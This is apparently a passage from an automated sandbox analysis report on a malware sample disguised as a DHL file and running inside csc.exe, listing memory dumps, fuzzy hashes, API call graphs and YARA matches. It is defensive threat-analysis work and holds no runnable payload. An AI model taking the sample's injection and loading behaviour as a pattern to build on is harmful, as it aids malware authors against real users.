                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c4e9bf4c23f44d6b5c7e4a9e58057dd5e54c53bbc54c7c606dd0b2605bfa0dc
                                                                                  • Instruction ID: b0e3dfd11e9c1a30415accb99e711c76ea43808d0ce634094f2ffc6ed43e785a
                                                                                  • Opcode Fuzzy Hash: 7c4e9bf4c23f44d6b5c7e4a9e58057dd5e54c53bbc54c7c606dd0b2605bfa0dc
                                                                                  • Instruction Fuzzy Hash: E3E0DF2110F3D94FD712DA3988644487F50AF8724078981FEC0848F2A7D52D894BC702
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 91b9b19c0c13658cc189be6b37c24dc03e5195f6ea79bb036afaa123d94b97b8
                                                                                  • Instruction ID: a99c21b6b21d7d74fe35dc72932f61817155a7aae40380292dd6e8268a3a4922
                                                                                  • Opcode Fuzzy Hash: 91b9b19c0c13658cc189be6b37c24dc03e5195f6ea79bb036afaa123d94b97b8
                                                                                  • Instruction Fuzzy Hash: 2BE09B52B2E99D5FDAB5931C14751783E919F4DA1074600EFC089D75E3D9045D0843C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c175d528a3bff598fb0eb7889cc2ec0e25c839e434fa96f37859640eef63cb2e
                                                                                  • Instruction ID: 3b880b4b16a4ebd1a208f64fbf451d8ba342f2af182e2c9d6093201c42bbf771
                                                                                  • Opcode Fuzzy Hash: c175d528a3bff598fb0eb7889cc2ec0e25c839e434fa96f37859640eef63cb2e
                                                                                  • Instruction Fuzzy Hash: A0E01A2255F7CD1ED72367B458210957F34AF87104B0A41E7E4D88B4B3DA586A2CD362
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 96a45373e44a8c3b3c8af143a9c7802f6ef1e3a5e8dc76f9d75e4db82a4ef3eb
                                                                                  • Instruction ID: bf5ec66efbd3671b8f56bbbabd84432d80fc56d2bf36660ac1b76e37ba2f4776
                                                                                  • Opcode Fuzzy Hash: 96a45373e44a8c3b3c8af143a9c7802f6ef1e3a5e8dc76f9d75e4db82a4ef3eb
                                                                                  • Instruction Fuzzy Hash: 28E0C23591494C4FCB50FFA9DC014EB77E8FB88325F00067BE82CC31A1E634A6258B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d010b4557bcd6d3305f452e33210ad43b6a99b31c0d062094239e68a605d9369
                                                                                  • Instruction ID: a08bd6cd79e77243b42ecc56be11fc7ba9fa6327a405cfb5427442eb7d538657
                                                                                  • Opcode Fuzzy Hash: d010b4557bcd6d3305f452e33210ad43b6a99b31c0d062094239e68a605d9369
                                                                                  • Instruction Fuzzy Hash: A6D05B31B1C7054FC61CDA68D8A243677E6FBD9704B51643DE4C3835A5CD20F901C681
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d8b29c6c705358f5161ced89059ad2bb24b4ea392c7fa136f8eb45c905f706da
                                                                                  • Instruction ID: af949212c781998648f6ea18b34443376edaa1ec5baa171e5054e237abd8f58a
                                                                                  • Opcode Fuzzy Hash: d8b29c6c705358f5161ced89059ad2bb24b4ea392c7fa136f8eb45c905f706da
                                                                                  • Instruction Fuzzy Hash: 2FD02B3051B6484FD368DB20849141977D0FFCB200FC10469E44487358C13E85428701
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1c85d33673d63fa63a5c89f4211070ee72888e3ec74697334b365db00a89fa21
• Instruction ID: e2b0640a7c7b780e54caaf1343847bb6d1058ddcc50f03d1ab7fdd9394e43994
• Opcode Fuzzy Hash: 1c85d33673d63fa63a5c89f4211070ee72888e3ec74697334b365db00a89fa21
• Instruction Fuzzy Hash: 17D0A7B1609301DBE71577A4C84605CFB71EF86300B125379E04B56172DBB5E747DAC2
Memory Dump Source
• Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e54c5b3bbeb6c371ad1ffde078b2b0cf98e89f90ea7749bd0f58e27b538c0fe4
• Instruction ID: 67e4c31984005538e00091c4f42d411e6e70fcdd58a47c39494a87d00438a017
• Opcode Fuzzy Hash: e54c5b3bbeb6c371ad1ffde078b2b0cf98e89f90ea7749bd0f58e27b538c0fe4
• Instruction Fuzzy Hash: 2DC01230A1A50D8BC759777484550547152AF49308BD40CBCD00DC62D6DA3F9892C701
Memory Dump Source
• Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e4c5615fa2b26f94a8df9a3462aaa45184ea36e93177dac4c4a01eb576d4f102
• Instruction ID: 8905282fb33f99596ccab8ab6c4d0d8aa56f6b81a5e97b3ac4a8c3f4143f421b
• Opcode Fuzzy Hash: e4c5615fa2b26f94a8df9a3462aaa45184ea36e93177dac4c4a01eb576d4f102
• Instruction Fuzzy Hash: 6AC08C12B6CA2912A63C39E8192B03D7E40CB99A20B8612BFEC06132A28C051E0200D6
Memory Dump Source
• Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: adb85a4fb69e791a0bd92603c997d868e70ecbb4318bef446e903051cbacaee7
• Instruction ID: 6c3383a5c5c2563bcb69629df604c3f32e8a37bdafea8d96d5fc37b2241e5d82
• Opcode Fuzzy Hash: adb85a4fb69e791a0bd92603c997d868e70ecbb4318bef446e903051cbacaee7
• Instruction Fuzzy Hash: 9ED023326197094BC228C750C4621D373D2FF48200F24D53BD0C7C3161CD20F5018740
Memory Dump Source
• Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b0c597e4e3a78b8198f725340626b00e96437e7dfb3d4f2f656b03dace7d535
• Instruction ID: 55b42d9a9c8277a38cad44fed349f3b805a4aecca395a17c639bd3280384a845
• Opcode Fuzzy Hash: 5b0c597e4e3a78b8198f725340626b00e96437e7dfb3d4f2f656b03dace7d535
• Instruction Fuzzy Hash: 1DC08C7062D38983C32CDB58C4A30BAB790AF84245F20383EF087850A2CA00BA46C942

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 5.4%
Signature Coverage: 8.5%
Total number of Nodes: 130
Total number of Limit Nodes: 9
execution_graph 84905 42fa23 84906 42f993 84905->84906 84910 42f9f0 84906->84910 84911 42e813 84906->84911 84908 42f9cd 84914 42e733 84908->84914 84917 42c993 84911->84917 84913 42e82e 84913->84908 84920 42c9e3 84914->84920 84916 42e74c 84916->84910 84918 42c9b0 84917->84918 84919 42c9c1 RtlAllocateHeap 84918->84919 84919->84913 84921 42ca00 84920->84921 84922 42ca11 RtlFreeHeap 84921->84922 84922->84916 84923 424d83 84928 424d9c 84923->84928 84924 424e29 84925 424de4 84926 42e733 RtlFreeHeap 84925->84926 84927 424df4 84926->84927 84928->84924 84928->84925 84929 424e24 84928->84929 84930 42e733 RtlFreeHeap 84929->84930 84930->84924 85018 42bc53 85019 42bc70 85018->85019 85022 5782df0 LdrInitializeThunk 85019->85022 85020 42bc98 85022->85020 85023 4249f3 85024 424a0f 85023->85024 85025 424a37 85024->85025 85026 424a4b 85024->85026 85027 42c663 NtClose 85025->85027 85028 42c663 NtClose 85026->85028 85029 424a40 85027->85029 85030 424a54 85028->85030 85033 42e853 RtlAllocateHeap 85030->85033 85032 424a5f 85033->85032 85034 42f8f3 85035 42f903 85034->85035 85036 42f909 85034->85036 85037 42e813 RtlAllocateHeap 85036->85037 85038 42f92f 85037->85038 84931 41b2a3 84933 41b2e7 84931->84933 84932 41b308 84933->84932 84935 42c663 84933->84935 84936 42c67d 84935->84936 84937 42c68e NtClose 84936->84937 84937->84932 84938 413ca3 84940 413cc9 84938->84940 84939 413cf3 84940->84939 84942 413a23 LdrInitializeThunk 84940->84942 84942->84939 85039 418cf3 85040 418cfc 85039->85040 85044 418d46 85039->85044 85041 418cfe 85040->85041 85042 42c663 NtClose 85040->85042 85043 418d22 85042->85043 85045 413f93 85046 413f99 85045->85046 85051 417753 85046->85051 85048 413fcb 85049 413fff PostThreadMessageW 85048->85049 85050 414010 85048->85050 85049->85050 85052 417777 85051->85052 85053 41777e 85052->85053 85054 4177b3 LdrLoadDll 85052->85054 85053->85048 85054->85053 84943 401a88 84944 401ac0 84943->84944 84947 42fdc3 84944->84947 84950 42e303 84947->84950 84951 42e326 84950->84951 84962 4076a3 84951->84962 84953 42e33c 84954 401b99 84953->84954 84965 41b0b3 84953->84965 84956 42e35b 84957 42e370 84956->84957 84980 42ca33 84956->84980 84976 428323 84957->84976 84960 42e38a 84961 42ca33 ExitProcess 84960->84961 84961->84954 84983 416413 84962->84983 84964 4076b0 84964->84953 84966 41b0df 84965->84966 85001 41afa3 84966->85001 84969 41b140 84969->84956 84970 41b10c 84971 41b117 84970->84971 84972 42c663 NtClose 84970->84972 84971->84956 84972->84971 84973 41b124 84973->84969 84974 42c663 NtClose 84973->84974 84975 41b136 84974->84975 84975->84956 84977 428385 84976->84977 84979 428392 84977->84979 85012 4185c3 84977->85012 84979->84960 84981 42ca50 84980->84981 84982 42ca61 ExitProcess 84981->84982 84982->84957 84984 41642d 84983->84984 84986 416446 84984->84986 84987 42d0e3 84984->84987 84986->84964 84989 42d0fd 84987->84989 84988 42d12c 84988->84986 84989->84988 84994 42bca3 84989->84994 84992 42e733 RtlFreeHeap 84993 42d1a5 84992->84993 84993->84986 84995 42bcbd 84994->84995 84998 5782c0a 84995->84998 84996 42bce9 84996->84992 84999 5782c1f LdrInitializeThunk 84998->84999 85000 5782c11 84998->85000 84999->84996 85000->84996 85002 41afbd 85001->85002 85006 41b099 85001->85006 85007 42bd43 85002->85007 85005 42c663 NtClose 85005->85006 85006->84970 85006->84973 85008 42bd5d 85007->85008 85011 57835c0 LdrInitializeThunk 85008->85011 85009 41b08d 85009->85005 85011->85009 85013 4185ed 85012->85013 85014 42e733 RtlFreeHeap 85013->85014 85017 418afb 85013->85017 85015 418732 85014->85015 85016 42ca33 ExitProcess 85015->85016 85015->85017 85016->85017 85017->84979 85055 5782b60 LdrInitializeThunk 85056 413a7d 85057 413a25 85056->85057 85058 413a9f 85057->85058 85061 42c903 85057->85061 85062 42c91d 85061->85062 85065 5782c70 LdrInitializeThunk 85062->85065 85063 413a45 85065->85063

Control-flow Graph

control_flow_graph 95 417753-41776f 96 417777-41777c 95->96 97 417772 call 42f433 95->97 98 417782-417790 call 42fa33 96->98 99 41777e-417781 96->99 97->96 102 4177a0-4177b1 call 42ddd3 98->102 103 417792-41779d call 42fcd3 98->103 108 4177b3-4177c7 LdrLoadDll 102->108 109 4177ca-4177cd 102->109 103->102 108->109
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177C5
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: a024970c4561fa55472800a4d5645d921e68bffc055f8e666addb27ae271a54c
• Instruction ID: 882278f1722999b2ae2fee7c2c05bf526a7b08a6d75949410eb985d036f34d6b
• Opcode Fuzzy Hash: a024970c4561fa55472800a4d5645d921e68bffc055f8e666addb27ae271a54c
• Instruction Fuzzy Hash: A30175B5E0020DA7DF10DBE1DC42FDEB7789B54308F4041A6E91897280F634EB498B95

Control-flow Graph

control_flow_graph 120 42c663-42c69c call 404a33 call 42d8c3 NtClose
APIs
• NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 93c36a3cf205b2cdfdda56150977d175043fba1793cb531f7e813bbf17b3f693
• Instruction ID: 9a481ffe3b3909425eb855f21b4fa8ec41c3612d1979e7aa9e08aa26fcf307f8
• Opcode Fuzzy Hash: 93c36a3cf205b2cdfdda56150977d175043fba1793cb531f7e813bbf17b3f693
• Instruction Fuzzy Hash: 8BE046366146147BD620FA9AEC01F9BB7ACDFC5714F40441AFA08A7282C675BA058BA8
APIs
Memory Dump Source
• Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5710000_csc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3e964b63873bca0a0a243bcf35be3914b0e8caed88b7f6f07867e53e30c8a637
• Instruction ID: 073580d74840e767f8004dafdbc54e2fe223c36cdbe51309d74ee21397e2cf1d
• Opcode Fuzzy Hash: 3e964b63873bca0a0a243bcf35be3914b0e8caed88b7f6f07867e53e30c8a637
• Instruction Fuzzy Hash: F190023220140413D515715855447070019C7E1241FD5C422A0428568D96568A52B137

Control-flow Graph

control_flow_graph 135 5782c70-5782c7c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5710000_csc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c9a43e26a369ace493e1db6b28ff8e4f50f3330a5de9566b083f06933f2fbf6c
• Instruction ID: d9706051d3024a5801b6a978df75f324927c45db6abe231e5b06eab882adc6b8
• Opcode Fuzzy Hash: c9a43e26a369ace493e1db6b28ff8e4f50f3330a5de9566b083f06933f2fbf6c
• Instruction Fuzzy Hash: FE90023220148802D5147158944474A0015C7E1301F99C421A4428668D869589917137

Control-flow Graph

control_flow_graph 134 5782b60-5782b6c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5710000_csc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 96cca28f3187dc9ba1aa9f03f8cb212392e716dcd478e366130c81ec641bb47d
• Instruction ID: 0f934ed662655eb1c20ecf9c168c01886c1a4ac27d0af7f4c11f4bd189fe9eff
• Opcode Fuzzy Hash: 96cca28f3187dc9ba1aa9f03f8cb212392e716dcd478e366130c81ec641bb47d
• Instruction Fuzzy Hash: 5F90026220240003450971585454616401AC7F1201B95C031E10185A0DC5258991713B
APIs
Memory Dump Source
• Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_5710000_csc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 06ffd222e949f528f311fec13e4b3686d2039333cc93c62ea5e96795dae16ccd
• Instruction ID: d6aed502c4bf8b6a6c2f36565cdd132277d88ac7c1c5a165bf1b0bb6bd19b149
• Opcode Fuzzy Hash: 06ffd222e949f528f311fec13e4b3686d2039333cc93c62ea5e96795dae16ccd
• Instruction Fuzzy Hash: 5690023260550402D504715855547061015C7E1201FA5C421A0428578D87958A5175B7

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID:
• String ID: 2361o4QI$2361o4QI
• API String ID: 0-3806180685
• Opcode ID: 90ffc0043d586c91035da57b9ed244951c132cf4f048220e8a5cacc39bbf6315
• Instruction ID: e8fa03bdc57d78a45342910ef7c8a7e3514e68057cf4e77ef0c3907ee85d6fff
• Opcode Fuzzy Hash: 90ffc0043d586c91035da57b9ed244951c132cf4f048220e8a5cacc39bbf6315
• Instruction Fuzzy Hash: 122156B2E00119BEEB11DFA1CC81DEFBB7CEF81758B444159F140A7145D6398E0A8BE1

Control-flow Graph

control_flow_graph 20 413f5d-413f65 21 413f67-413f87 20->21 22 413fab-413fb2 20->22 23 413fb8-413ffd call 417753 call 4049a3 call 424ea3 22->23 24 413fb3 call 42f1e3 22->24 31 41401d-414023 23->31 32 413fff-41400e PostThreadMessageW 23->32 24->23 32->31 33 414010-41401a 32->33 33->31
APIs
• PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041400A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 2361o4QI$2361o4QI
• API String ID: 1836367815-3806180685
• Opcode ID: 2d3ccf23bd1e023b1fbabad5914fe7a0c26db93106ef8b02e9160a6dafcff11e
• Instruction ID: 8cbf97874721c207046154e43b058d99ff2e5aefe0913e325d3905e00d688be1
• Opcode Fuzzy Hash: 2d3ccf23bd1e023b1fbabad5914fe7a0c26db93106ef8b02e9160a6dafcff11e
• Instruction Fuzzy Hash: 33115072E01158BAEB119EA5DC82CFE7B7CEFC5758F41406AFA04B7100D6395E0647E5

Control-flow Graph

APIs
• PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041400A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 2361o4QI$2361o4QI
• API String ID: 1836367815-3806180685
• Opcode ID: 5d1477c64146abff2f10f711019a9778fb2fbeeaebe55ef00e05fe84ad753c4b
• Instruction ID: d18ac804c7d2dd6a07671b49327f6e5d33a89531f029e24374fb9e558da5f6d9
• Opcode Fuzzy Hash: 5d1477c64146abff2f10f711019a9778fb2fbeeaebe55ef00e05fe84ad753c4b
• Instruction Fuzzy Hash: 5111E9B1D0015CBAEB11AAA18C81CEF7B7CDF84758F448069FA14A7141D6785E0A8BE5

Control-flow Graph

APIs
• PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041400A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID: 2361o4QI$2361o4QI
• API String ID: 1836367815-3806180685
• Opcode ID: 859fb626634821dde29a0609894101e9eef2ca991620197f7cb3afc08160fd5d
• Instruction ID: fd4e2a792fd360051d9b73504d4abf74b32c3d31853742531548d41b9085dbc7
• Opcode Fuzzy Hash: 859fb626634821dde29a0609894101e9eef2ca991620197f7cb3afc08160fd5d
• Instruction Fuzzy Hash: 5601DBB1D0011C7AEB10AAE19C81DEF7B7CDF84798F448069FA14B7141D6785E068BF5

Control-flow Graph

control_flow_graph 115 42c9e3-42ca27 call 404a33 call 42d8c3 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,5C468B5C,00000007,00000000,00000004,00000000,00416FD5,000000F4), ref: 0042CA22
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 5f68cb7d82b81062bbfcc78d4a111bf76dc2e6db85f06c16af699c288adbcfc5
• Instruction ID: 49fd3192c8f19e4773edbc2c94e05b256c7b00cb1cb22bca70981a03036fcd12
• Opcode Fuzzy Hash: 5f68cb7d82b81062bbfcc78d4a111bf76dc2e6db85f06c16af699c288adbcfc5
• Instruction Fuzzy Hash: 9AE06DB16082047BC614EF59EC41E9B77ACDFC5710F004419FA08A7241D675BD108BB9

                                                                                  Control-flow Graph

control_flow_graph 110 42c993-42c9d7 call 404a33 call 42d8c3 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,0041E56E,?,?,00000000,?,0041E56E,?,?,?), ref: 0042C9D2
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 1d9f2867c6562e32d1f2ed2233ac2ef1fb1a165fc89a58d93122af4896114f78
• Instruction ID: 8e501b71c5e3c54ee151989a67f9709c1142d50669a8497be3cda63ed2b212e3
• Opcode Fuzzy Hash: 1d9f2867c6562e32d1f2ed2233ac2ef1fb1a165fc89a58d93122af4896114f78
• Instruction Fuzzy Hash: 39E06D716042047BC614EE59EC41E9B77ACEFC8710F00441AFA18A7242D670B9108BB9

Control-flow Graph

control_flow_graph 125 42ca33-42ca6f call 404a33 call 42d8c3 ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,FBF4E0C3,?,?,FBF4E0C3), ref: 0042CA6A
Memory Dump Source
• Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_csc.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: fad0052eb9bca92c5d2911e37fb90033c30c84320f1b66b6f82743aff0afe31f
• Instruction ID: ac58fccdbd163d129240ee67b65ec416428b6f97e0c066e93c009288e506961d
• Opcode Fuzzy Hash: fad0052eb9bca92c5d2911e37fb90033c30c84320f1b66b6f82743aff0afe31f
• Instruction Fuzzy Hash: E9E04F767403147BD610FA5ADC42F9B775CDFC5714F00441AFA4867241C6B079058BF5

Control-flow Graph

                                                                                  control_flow_graph 130 5782c0a-5782c0f 131 5782c1f-5782c26 LdrInitializeThunk 130->131 132 5782c11-5782c18 130->132
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 26f9c4bd970f2d39e7d75b60c69afa92ad806c660402b99209173e247ae5fece
                                                                                  • Instruction ID: e684e434b2ee236d1cba81543d490cf82e43e7e350cfb6f2be12035bd91447e8
                                                                                  • Opcode Fuzzy Hash: 26f9c4bd970f2d39e7d75b60c69afa92ad806c660402b99209173e247ae5fece
                                                                                  • Instruction Fuzzy Hash: 7FB04C729415C585DA15A7605608A267911A791701F55C061D2024655A47288191F176
                                                                                  Strings
                                                                                  • The instruction at %p tried to %s , xrefs: 057F8F66
                                                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 057F8F2D
                                                                                  • read from, xrefs: 057F8F5D, 057F8F62
                                                                                  • This failed because of error %Ix., xrefs: 057F8EF6
                                                                                  • *** enter .cxr %p for the context, xrefs: 057F8FBD
                                                                                  • The resource is owned shared by %d threads, xrefs: 057F8E2E
                                                                                  • The instruction at %p referenced memory at %p., xrefs: 057F8EE2
                                                                                  • *** then kb to get the faulting stack, xrefs: 057F8FCC
                                                                                  • write to, xrefs: 057F8F56
                                                                                  • The resource is owned exclusively by thread %p, xrefs: 057F8E24
                                                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 057F8DC4
                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 057F8FEF
                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 057F8DB5
                                                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 057F8E02
                                                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 057F8E4B
                                                                                  • Go determine why that thread has not released the critical section., xrefs: 057F8E75
                                                                                  • <unknown>, xrefs: 057F8D2E, 057F8D81, 057F8E00, 057F8E49, 057F8EC7, 057F8F3E
                                                                                  • The critical section is owned by thread %p., xrefs: 057F8E69
                                                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 057F8DD3
                                                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 057F8E86
                                                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 057F8E3F
                                                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 057F8F34
                                                                                  • *** enter .exr %p for the exception record, xrefs: 057F8FA1
                                                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 057F8F3F
                                                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 057F8D8C
                                                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 057F8DA3
                                                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 057F8F26
                                                                                  • an invalid address, %p, xrefs: 057F8F7F
                                                                                  • *** Inpage error in %ws:%s, xrefs: 057F8EC8
                                                                                  • a NULL pointer, xrefs: 057F8F90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
